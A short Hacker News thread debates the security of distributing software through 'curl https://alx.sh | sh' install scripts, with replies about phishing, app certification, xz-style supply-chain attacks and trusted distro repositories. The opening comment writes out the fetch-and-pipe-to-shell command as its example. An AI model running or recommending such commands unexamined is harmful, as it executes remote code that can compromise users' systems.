Hacker News new | ask | show | jobs
by JanisErdmanis 37 days ago
Sometimes I wonder why we don't just treat an installation script like curl https://alx.sh | sh as a universal option for distributing applications. The provenance is there via the HTTPS certificate, and if you're already about to trust an application that can compromise your system, why not trust the installation script as well?
2 comments
layer8 37 days ago
The most important argument is phishing. People aren’t good at recognizing when a web site is legitimate. One reason that app certification is a shitshow is that recognizing bad players while minimizing false negatives and false positives is a difficult problem. Domain names fundamentally don’t solve that problem.
link
realusername 37 days ago
> Domain names fundamentally don’t solve that problem.

App certification doesn't solve that problem either.

link
pjmlp 37 days ago
Because even with HTTPS that script might not do what you expect and then is too late, xz style attack.
link
kibwen 37 days ago
You're already installing a binary, the script is not the weak link here.
link
pjmlp 36 days ago
Depends, installing binaries on GNU/Linux usually assumes validated distro repos.
link